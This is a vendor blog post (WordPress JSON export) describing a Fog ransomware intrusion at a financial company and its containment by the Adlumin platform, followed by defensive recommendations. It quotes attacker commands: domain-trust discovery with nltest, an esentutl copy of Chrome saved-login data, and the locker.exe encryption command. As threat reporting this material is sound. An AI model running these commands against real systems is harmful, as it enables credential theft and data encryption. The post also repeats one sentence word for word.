{"id":70289,"date":"2024-09-05T17:42:25","date_gmt":"2024-09-05T16:42:25","guid":{"rendered":"https:\/\/www.n-able.com\/?p=70289"},"modified":"2026-03-30T16:51:05","modified_gmt":"2026-03-30T15:51:05","slug":"fog-ransomware-now-targeting-the-financial-sector","status":"publish","type":"post","link":"https:\/\/www.n-able.com\/de\/blog\/fog-ransomware-now-targeting-the-financial-sector","title":{"rendered":"Fog Ransomware Now Targeting the Financial Sector"},"content":{"rendered":"<p>In early August 2024, threat actors launched a ransomware attack on a mid-sized financial business using compromised VPN credentials. The cybercriminals deployed a ransomware variant known as \u201cFog\u201d (a.k.a. \u201cLost in the Fog\u201d) targeting sensitive data on endpoints running both Windows and Linux operating systems. However, the attack was successfully thwarted by the Adlumin platform\u2019s innovative technology, which uses decoy files as sensors to detect ransomware activity within the network.<\/p>\n<h2><span>The Fog Ransomware<\/span><\/h2>\n<p>Fog is a variant of the STOP\/DJVU ransomware family, first observed in<span>\u00a0<\/span><strong><span><a href=\"https:\/\/www.beforecrypt.com\/en\/fog-ransomware\/\" target=\"_blank\" rel=\"noopener\">2021<\/a><\/span><\/strong>. It exploits vulnerabilities in compromised VPN credentials to breach network defenses and primarily targets sectors such as education and recreation. Once inside a network, Fog uses advanced techniques, including pass-the-hash attacks, to escalate privileges to an administrative level, significantly amplifying its impact. It exploits vulnerabilities in compromised VPN credentials to breach network defenses and primarily targets sectors such as education and recreation.<\/p>\n<p>After infiltration, Fog executes a series of actions designed to cripple network security. These include disabling protective mechanisms, encrypting critical files\u2014especially Virtual Machine Disks (VMDKs)\u2014and eradicating backup data, leaving victims with little choice but to consider paying the ransom. The encrypted files are typically marked with extensions like \u2018.FOG\u2019 or \u2018.FLOCKED\u2019 and are accompanied by a ransom note directing victims to a negotiation platform on the Tor network.<\/p>\n<p>The lack of direct attribution to established APT groups suggests that Fog ransomware likely originates from a new, highly skilled threat actor.<\/p>\n<h2><span>Network Discovery<\/span><\/h2>\n<p>The attackers initiated network discovery by sending a series of pings targeting other endpoints. They stored the output of these pings in text files, \u2018pings.txt\u2019 and \u2018pingw.txt\u2019. Subsequently, they used the tool \u2018Advanced_Port_Scanner_2.5.3869(1).exe\u2019 to conduct network reconnaissance, scanning hosts within the network using elevated privileges from the compromised service accounts.<\/p>\n<h2><span>Lateral Movement<\/span><\/h2>\n<p>The Adlumin team traced the infiltration to an unprotected system, with the attack originating from an IP address in Russia. The attackers used two compromised service accounts to move laterally within the network, leveraging domain trust relationship information by executing the command:<\/p>\n<hr \/>\n<p><em><strong>nltest \/domain_trusts<\/strong><\/em><\/p>\n<hr \/>\n<p>They then deployed a binary called \u2018SharpShares.exe\u2019 to map network drives and share folders on other machines, enabling further lateral movement.<\/p>\n<h2><span>Credential Harvesting<\/span><\/h2>\n<p>The next step involved using the Microsoft command-line utility \u2018esentutl.exe\u2019 to back up login data stored on endpoints for multiple users, including encrypted credentials from Google Chrome, using the following command:<\/p>\n<hr \/>\n<p><em><strong>cmd.exe \/Q \/c esentutl.exe \/y \u201cC:\\Users\\\u201dUSERNAME\u201d\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data\u201d \/d \u201cC:\\Users\\\u201dUSERNAME\u201d\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data.tmp\u201d<\/strong><\/em><\/p>\n<hr \/>\n<h2><span>Execution<\/span><\/h2>\n<p>The threat actor used \u2018Rclone\u2019, a powerful open-source command-line tool, to sync and transfer data from compromised endpoints. They tailored the command to include files modified within the last two years while excluding certain file types.<\/p>\n<p>The ransomware was propagated using a tool named \u2018locker.exe\u2019, signifying its role in encrypting or \u2018locking\u2019 the files. The following command was executed:<\/p>\n<hr \/>\n<p><em><strong>C:\\programdata\\locker.exe -id xCcNKl -nomutex -size 10 -console -target \\\\\u201dHOSTS\u201d .DOMAIN.COM\\\u201dSHAREDRIVE\u201d<\/strong><\/em><\/p>\n<hr \/>\n<p>A \u2018readme.txt\u2019 file containing the ransom letter was then placed on all infected endpoints. Additionally, the attackers used WMIC and PowerShell commands to delete system shadow copies, preventing victims from restoring their files from backups.<\/p>\n<h2><span>Ransomware Prevention<\/span><\/h2>\n<p>As the attack progressed to the exfiltration phase,<span> the <\/span><strong><span>Ransomware Prevention<\/span><\/strong><span>\u00a0<\/span>feature of the <a href=\"https:\/\/www.n-able.com\/products\/adlumin\">Adlumin platform<\/a> automatically isolated the affected machines, locked out the attackers, and prevented data theft. Launched in April 2024, this service consists of scripts embedded within the Adlumin Security Platform Agent that monitor malicious activities across customers\u2019 networks.<\/p>\n<p>The agent deploys decoy files on protected endpoints that remain dormant until abnormal or malicious activity is detected. If ransomware attempts to encrypt these files, the scripts automatically execute commands to remove the affected devices from the network, containing the threat and preventing further damage. Alerts are sent to the Adlumin platform for further investigation.<\/p>\n<p>The Ransomware Prevention is a first-of-its-kind patented technology, representing a significant advancement in the fight against ransomware.<\/p>\n<h2><span>Recovery<\/span><\/h2>\n<p>After isolating the targeted endpoints, security engineers examined the systems and found binaries for port scanners, encryption software, RMM tools, and other artifacts left by the attackers. They also identified the vulnerable endpoints that facilitated the unauthorized access.<\/p>\n<p>The impacted systems were evaluated and restored to full health, eliminating the potential for another similar attack.<\/p>\n<h2><span>Recommendations<\/span><\/h2>\n<p>We recommend the following measures to protect against Fog ransomware attacks:<\/p>\n<ul>\n<li><strong>Use Multi-Factor Authentication (MFA)<\/strong>: Implement MFA for all VPN connections to reduce the risk of compromised credentials.<\/li>\n<li><strong>Regularly Update and Patch VPN Software<\/strong>: Ensure all VPN applications are up to date with the latest security patches.<\/li>\n<li><strong>Monitor VPN Access<\/strong>: Implement monitoring tools to detect suspicious activities, such as unusual login attempts or access from unfamiliar locations.<\/li>\n<li><strong>Isolate Affected Endpoints<\/strong>: Implement automated isolation procedures that trigger when ransomware is detected.<\/li>\n<li><strong>Utilize a Comprehensive Security Platform<\/strong>: Protect endpoints with a platform like the Adlumin Security Operations Platform, which can monitor and respond to threats in real-time.<\/li>\n<li><strong>Disable Unnecessary Services<\/strong>: Avoid using Windows Management Instrumentation Command-line (WMIC) and PowerShell scripts unless necessary.<\/li>\n<li><strong>Regularly Backup Critical Data<\/strong>: Maintain up-to-date backups stored offline or in a secure, immutable environment.<\/li>\n<li><strong>Apply the Principle of Least Privilege<\/strong>: Limit administrative privileges to minimize the impact of a successful attack.<\/li>\n<li><strong>Conduct Regular Security Audits<\/strong>: Regularly audit network and endpoint security to identify and rectify vulnerabilities.<\/li>\n<li><strong>Establish Incident Response Plans<\/strong>: Develop and test incident response plans for detecting, containing, and recovering from ransomware attacks.<\/li>\n<li><strong>Monitor Network Traffic<\/strong>: Use advanced threat detection to monitor network traffic for signs of lateral movement or other suspicious activities.<\/li>\n<\/ul>\n<p>Finally, companies should consider adding the Ransomware Prevention service to their network endpoints to prevent ransomware attacks from escalating.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Protect endpoints from ransomware with automated isolation, backups, least privilege, and Adlumin\u2019s platform. Learn key prevention steps and request a demo!<\/p>\n","protected":false},"author":24,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"inline_featured_image":false,"footnotes":""},"class_list":["post-70289","post","type-post","status-publish","format-standard","hentry","topic-cyber-resilience","topic-security"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO Premium plugin v27.2 (Yoast SEO v27.2) - https:\/\/yoast.com\/product\/yoast-seo-premium-wordpress\/ -->\n<title>Fog Ransomware Now Targeting the Financial Sector - N-able<\/title>\n<meta name=\"description\" content=\"Protect endpoints from ransomware with automated isolation, backups, least privilege, and the Adlumin platform. Learn key prevention steps!\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.n-able.com\/de\/blog\/fog-ransomware-now-targeting-the-financial-sector\" \/>\n<meta property=\"og:locale\" content=\"de_DE\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Fog Ransomware Now Targeting the Financial Sector - N-able\" \/>\n<meta property=\"og:description\" content=\"Protect endpoints from ransomware with automated isolation, backups, least privilege, and the Adlumin platform. Learn key prevention steps!\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.n-able.com\/de\/blog\/fog-ransomware-now-targeting-the-financial-sector\" \/>\n<meta property=\"og:site_name\" content=\"N-able\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/NableMSP\" \/>\n<meta property=\"article:published_time\" content=\"2024-09-05T16:42:25+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2026-03-30T15:51:05+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.n-able.com\/wp-content\/uploads\/2025\/08\/2508_Adlumin_BlogHeaders_FogRansomwareNowTargetingtheFinancialSectorAdluminThwartsAttack.png\" \/>\n\t<meta property=\"og:image:width\" content=\"1600\" \/>\n\t<meta property=\"og:image:height\" content=\"900\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"author\" content=\"N-able\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@Nable\" \/>\n<meta name=\"twitter:site\" content=\"@Nable\" \/>\n<meta name=\"twitter:label1\" content=\"Verfasst von\" \/>\n\t<meta name=\"twitter:data1\" content=\"N-able\" \/>\n\t<meta name=\"twitter:label2\" content=\"Gesch\u00e4tzte Lesezeit\" \/>\n\t<meta name=\"twitter:data2\" content=\"5\u00a0Minuten\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/www.n-able.com\/de\/blog\/fog-ransomware-now-targeting-the-financial-sector#article\",\"isPartOf\":{\"@id\":\"https:\/\/www.n-able.com\/de\/blog\/fog-ransomware-now-targeting-the-financial-sector\"},\"author\":{\"name\":\"N-able\",\"@id\":\"https:\/\/www.n-able.com\/de#\/schema\/person\/f46a000e389b6d02bd4b3866e7828a7b\"},\"headline\":\"Fog Ransomware Now Targeting the Financial Sector\",\"datePublished\":\"2024-09-05T17:42:25+01:00\",\"dateModified\":\"2026-03-30T15:51:05+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/www.n-able.com\/de\/blog\/fog-ransomware-now-targeting-the-financial-sector\"},\"wordCount\":959,\"publisher\":{\"@id\":\"https:\/\/www.n-able.com\/de#organization\"},\"inLanguage\":\"de\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.n-able.com\/de\/blog\/fog-ransomware-now-targeting-the-financial-sector\",\"url\":\"https:\/\/www.n-able.com\/de\/blog\/fog-ransomware-now-targeting-the-financial-sector\",\"name\":\"Fog Ransomware Now Targeting the Financial Sector - N-able\",\"isPartOf\":{\"@id\":\"https:\/\/www.n-able.com\/de#website\"},\"datePublished\":\"2024-09-05T17:42:25+01:00\",\"dateModified\":\"2026-03-30T15:51:05+00:00\",\"description\":\"Protect endpoints from ransomware with automated isolation, backups, least privilege, and the Adlumin platform. Learn key prevention steps!\",\"inLanguage\":\"de\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.n-able.com\/de\/blog\/fog-ransomware-now-targeting-the-financial-sector\"]}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.n-able.com\/de#website\",\"url\":\"https:\/\/www.n-able.com\/de\",\"name\":\"N-able\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\/\/www.n-able.com\/de#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.n-able.com\/de?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"de\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/www.n-able.com\/de#organization\",\"name\":\"N-able\",\"url\":\"https:\/\/www.n-able.com\/de\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"de\",\"@id\":\"https:\/\/www.n-able.com\/de#\/schema\/logo\/image\/\",\"url\":\"https:\/\/www.n-able.com\/wp-content\/uploads\/2021\/02\/logo-n-able-vertical-dark.svg\",\"contentUrl\":\"https:\/\/www.n-able.com\/wp-content\/uploads\/2021\/02\/logo-n-able-vertical-dark.svg\",\"width\":\"1024\",\"height\":\"1024\",\"caption\":\"N-able\"},\"image\":{\"@id\":\"https:\/\/www.n-able.com\/de#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/NableMSP\",\"https:\/\/x.com\/Nable\",\"https:\/\/www.linkedin.com\/company\/n-able\",\"https:\/\/www.youtube.com\/channel\/UClnp77HHg4aME-S-3fWQhFw\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.n-able.com\/de#\/schema\/person\/f46a000e389b6d02bd4b3866e7828a7b\",\"name\":\"N-able\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"de\",\"@id\":\"https:\/\/secure.gravatar.com\/avatar\/e9c468b7c98137ecdd5508befa660c205a7978133257080a37fb0b1362d53411?s=96&d=mm&r=g\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/e9c468b7c98137ecdd5508befa660c205a7978133257080a37fb0b1362d53411?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/e9c468b7c98137ecdd5508befa660c205a7978133257080a37fb0b1362d53411?s=96&d=mm&r=g\",\"caption\":\"N-able\"}}]}<\/script>\n<!-- \/ Yoast SEO Premium plugin. -->","yoast_head_json":{"title":"Fog Ransomware Now Targeting the Financial Sector - N-able","description":"Protect endpoints from ransomware with automated isolation, backups, least privilege, and the Adlumin platform. Learn key prevention steps!","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.n-able.com\/de\/blog\/fog-ransomware-now-targeting-the-financial-sector","og_locale":"de_DE","og_type":"article","og_title":"Fog Ransomware Now Targeting the Financial Sector - N-able","og_description":"Protect endpoints from ransomware with automated isolation, backups, least privilege, and the Adlumin platform. Learn key prevention steps!","og_url":"https:\/\/www.n-able.com\/de\/blog\/fog-ransomware-now-targeting-the-financial-sector","og_site_name":"N-able","article_publisher":"https:\/\/www.facebook.com\/NableMSP","article_published_time":"2024-09-05T16:42:25+00:00","article_modified_time":"2026-03-30T15:51:05+00:00","og_image":[{"width":1600,"height":900,"url":"https:\/\/www.n-able.com\/wp-content\/uploads\/2025\/08\/2508_Adlumin_BlogHeaders_FogRansomwareNowTargetingtheFinancialSectorAdluminThwartsAttack.png","type":"image\/png"}],"author":"N-able","twitter_card":"summary_large_image","twitter_creator":"@Nable","twitter_site":"@Nable","twitter_misc":{"Verfasst von":"N-able","Gesch\u00e4tzte Lesezeit":"5\u00a0Minuten"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.n-able.com\/de\/blog\/fog-ransomware-now-targeting-the-financial-sector#article","isPartOf":{"@id":"https:\/\/www.n-able.com\/de\/blog\/fog-ransomware-now-targeting-the-financial-sector"},"author":{"name":"N-able","@id":"https:\/\/www.n-able.com\/de#\/schema\/person\/f46a000e389b6d02bd4b3866e7828a7b"},"headline":"Fog Ransomware Now Targeting the Financial Sector","datePublished":"2024-09-05T17:42:25+01:00","dateModified":"2026-03-30T15:51:05+00:00","mainEntityOfPage":{"@id":"https:\/\/www.n-able.com\/de\/blog\/fog-ransomware-now-targeting-the-financial-sector"},"wordCount":959,"publisher":{"@id":"https:\/\/www.n-able.com\/de#organization"},"inLanguage":"de"},{"@type":"WebPage","@id":"https:\/\/www.n-able.com\/de\/blog\/fog-ransomware-now-targeting-the-financial-sector","url":"https:\/\/www.n-able.com\/de\/blog\/fog-ransomware-now-targeting-the-financial-sector","name":"Fog Ransomware Now Targeting the Financial Sector - N-able","isPartOf":{"@id":"https:\/\/www.n-able.com\/de#website"},"datePublished":"2024-09-05T17:42:25+01:00","dateModified":"2026-03-30T15:51:05+00:00","description":"Protect endpoints from ransomware with automated isolation, backups, least privilege, and the Adlumin platform. Learn key prevention steps!","inLanguage":"de","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.n-able.com\/de\/blog\/fog-ransomware-now-targeting-the-financial-sector"]}]},{"@type":"WebSite","@id":"https:\/\/www.n-able.com\/de#website","url":"https:\/\/www.n-able.com\/de","name":"N-able","description":"","publisher":{"@id":"https:\/\/www.n-able.com\/de#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.n-able.com\/de?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"de"},{"@type":"Organization","@id":"https:\/\/www.n-able.com\/de#organization","name":"N-able","url":"https:\/\/www.n-able.com\/de","logo":{"@type":"ImageObject","inLanguage":"de","@id":"https:\/\/www.n-able.com\/de#\/schema\/logo\/image\/","url":"https:\/\/www.n-able.com\/wp-content\/uploads\/2021\/02\/logo-n-able-vertical-dark.svg","contentUrl":"https:\/\/www.n-able.com\/wp-content\/uploads\/2021\/02\/logo-n-able-vertical-dark.svg","width":"1024","height":"1024","caption":"N-able"},"image":{"@id":"https:\/\/www.n-able.com\/de#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/NableMSP","https:\/\/x.com\/Nable","https:\/\/www.linkedin.com\/company\/n-able","https:\/\/www.youtube.com\/channel\/UClnp77HHg4aME-S-3fWQhFw"]},{"@type":"Person","@id":"https:\/\/www.n-able.com\/de#\/schema\/person\/f46a000e389b6d02bd4b3866e7828a7b","name":"N-able","image":{"@type":"ImageObject","inLanguage":"de","@id":"https:\/\/secure.gravatar.com\/avatar\/e9c468b7c98137ecdd5508befa660c205a7978133257080a37fb0b1362d53411?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/e9c468b7c98137ecdd5508befa660c205a7978133257080a37fb0b1362d53411?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/e9c468b7c98137ecdd5508befa660c205a7978133257080a37fb0b1362d53411?s=96&d=mm&r=g","caption":"N-able"}}]}},"_links":{"self":[{"href":"https:\/\/www.n-able.com\/de\/wp-json\/wp\/v2\/posts\/70289","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.n-able.com\/de\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.n-able.com\/de\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.n-able.com\/de\/wp-json\/wp\/v2\/users\/24"}],"replies":[{"embeddable":true,"href":"https:\/\/www.n-able.com\/de\/wp-json\/wp\/v2\/comments?post=70289"}],"version-history":[{"count":0,"href":"https:\/\/www.n-able.com\/de\/wp-json\/wp\/v2\/posts\/70289\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.n-able.com\/de\/wp-json\/wp\/v2\/media?parent=70289"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}